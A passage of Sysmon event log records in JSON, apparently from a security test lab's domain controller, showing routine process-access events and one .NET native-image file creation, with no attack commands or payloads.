{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7316,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.746\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001096D90A00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.746","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001096D90A00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7317,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:48.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:48.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7318,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:49.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:49.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7319,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:50.293\r\nProcessGuid: {E2A3D6B1-131F-5F25-0000-001096D90A00}\r\nProcessId: 4652\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\122c-0\\Microsoft.ActiveDirectory.Management.dll\r\nCreationUtcTime: 2020-08-01 07:00:50.293","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:50.293","ProcessGuid":"{E2A3D6B1-131F-5F25-0000-001096D90A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\122c-0\\Microsoft.ActiveDirectory.Management.dll","CreationUtcTime":"2020-08-01 07:00:50.293","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7320,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:50.371\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1322-5F25-0000-0010DAE00A00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:50.371","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1322-5F25-0000-0010DAE00A00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7321,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:50.371\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1322-5F25-0000-0010DAE00A00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:50.371","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1322-5F25-0000-0010DAE00A00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7322,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:50.371\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1322-5F25-0000-0010DAE00A00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:50.371","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1322-5F25-0000-0010DAE00A00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7323,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:50.418\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1322-5F25-0000-00105AE40A00}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:50.418","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1322-5F25-0000-00105AE40A00}","TargetProcessId":"800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v